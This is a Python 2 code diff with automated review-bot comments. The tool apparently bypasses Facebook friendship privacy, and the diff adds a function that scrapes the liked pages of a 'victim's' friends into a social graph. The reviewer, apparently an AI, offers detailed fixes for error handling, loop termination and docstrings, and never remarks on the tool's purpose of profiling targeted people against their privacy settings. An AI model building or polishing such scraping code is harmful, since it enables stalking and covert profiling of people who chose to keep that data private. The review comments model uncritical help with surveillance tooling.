@@ -1339,6 +1271,7 @@ def analyzeGraph(victim): edgesValues = {} nodekeys = {} userNames = [] + commonPages = {} A,idkeys = loadObjects(victim) if A != []: @@ -1359,6 +1292,7 @@ def analyzeGraph(victim): print 'Attemping to get user\'s information' for elements in idkeys.keys(): user = getName(elements) + commonPages[user] = corePagesLike(victim,elements) userNames.append(user) nodekeys[idkeys[elements]] = user percentage = (i * 100.0)/len(idkeys.keys()) @@ -1401,7 +1335,7 @@ def analyzeGraph(victim): labelGraph = nx.Graph() for label in labelNodes: - labelGraph.add_node(nodekeys[int(label)]) + labelGraph.add_node(nodekeys[int(label)],likes=commonPages[nodekeys[int(label)]]) for labelE in labelEdges: labelGraph.add_edge(nodekeys[int(labelE[0])],nodekeys[int(labelE[1])]) @@ -1617,7 +1551,8 @@ def bypassFriendshipPrivacyPlot(victim, transitive): plt.savefig(root+'\\'+directory+'\\'+victim+"graph_color.png") write_dot(myGraph,root+'\\'+directory+'\\'+victim+"graph_color.dot") plt.show() - + + def bypassFriendshipPrivacy(victim, transitive): #Percentage container 
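Review bot: The new `commonPages[user] = corePagesLike(victim,elements)` adds one fetch per user inside the `for elements in idkeys.keys()` loop, and `corePagesLike` (added later in this commit) re-raises `mechanize.HTTPError`/`URLError` instead of returning, so a single failed fetch aborts the whole of `analyzeGraph` unless a handler around the loop, outside this hunk, catches it. Either catch it at the call (`except (mechanize.HTTPError, mechanize.URLError): commonPages[user] = []`) or document at the call that the caller is expected to handle it. Keying by `user` also means that, if `getName` resolves ids to display names as its use in `userNames` suggests, two users with the same name overwrite each other's entry; the id `elements` would be the unambiguous key. analyzeGraph starts and ends outside the hunk.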
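Review bot: `nodekeys[int(label)]` is evaluated twice in the rewritten `labelGraph.add_node(...)` line, once for the node and once to index `commonPages`; binding it once reads better and avoids the double lookup: `name = nodekeys[int(label)]` then `labelGraph.add_node(name, likes=commonPages[name])`. A name absent from `commonPages` raises KeyError here, so if the fill loop above can ever skip a user, `commonPages.get(name, [])` is the safer index. The loop is inside `analyzeGraph`, which extends beyond the hunk.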
@@ -1706,6 +1641,61 @@ def bypassFriendshipPrivacy(victim, transitive): friendshipFile.close() +def corePagesLike(victim,transitive): + matchs = [] + begin = 0 + page = [] + + try: + response = br.open('https://www.facebook.com/'+str(victim)+'?and='+str(transitive)+'&sk=favorites') + resultado = response.read() + match = re.search('timelineFriendsColumnHeader',resultado) + if match is not None: + linea = re.search('timelineFriendsColumnHeader(.+)',resultado).group() + + except mechanize.HTTPError as e: + print e.code + #Should handle a custom error + raise + except mechanize.URLError as e: + print e.reason.args + #Should handle a custom error + raise + #Error connection the upper function will catch the exception + except: + raise + + while True: + match = re.search('fbStreamTimelineFavInfoContainer',resultado[begin:]) + if match != None: + matchEnd = re.search('\n',resultado[begin+match.start():]) + if matchEnd != None: + matchs.append(resultado[begin+match.start():matchEnd.end()+begin+match.start()]) + begin = matchEnd.end()+begin+match.start() + match = None + matchEnd = None + else: + break + + + for linea in matchs: + start = 0 + try: + #Search the string to get the position of the starting match + matchAnd = re.search('page\.php\?id=',linea[start:]) + #Search the end of the match for taking the id length + matchEnd = re.search('">',linea[start+matchAnd.end():]) + #If we have a start and an end, we have the id value + except: + print 'ERROR' + + + if (matchAnd and matchEnd) is not None: + #Appends the value given the proper position (resolved a few lines up) + page.append(linea[start+matchAnd.end():start+matchEnd.start()+matchAnd.end() ]) + #Moves the pointer for next match + start += matchEnd.start()+matchAnd.end() + return page def coreFriendshipPrivacy(victim,transitive): friends = []
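Review bot: The new `corePagesLike` computes `match` and `linea` from `timelineFriendsColumnHeader` in the first `try` and never uses them (`linea` is rebound by the later `for linea in matchs` loop), and the closing `except: raise` is a no-op because an unhandled exception propagates anyway, so both can go, leaving `resultado = response.read()` and the two mechanize handlers. In the `while True` loop the `else: break` appears to pair with `if match != None:` (indentation is lost in this view), so when a container is found but no `'\n'` follows it `matchEnd` is None, `begin` is not advanced and the loop never terminates; `if match is None or matchEnd is None: break` closes that path. In the `for` loop a line without `page.php?id=` makes `matchAnd` None, so `matchAnd.end()` raises AttributeError that the bare `except` turns into a printed `ERROR`, and the guard `if (matchAnd and matchEnd) is not None:` works only through short-circuiting; test the first match before searching for the second and write the guard as `if matchAnd is not None and matchEnd is not None:`. A docstring is missing; `"""Return the ids from page.php?id= links inside the fbStreamTimelineFavInfoContainer blocks of the fetched page; network errors propagate to the caller."""` states the visible contract. The regex literals should be raw strings (`r'page\.php\?id='`, `r'\n'`) and `match != None` should be `is not None`, as the function's own first check already does.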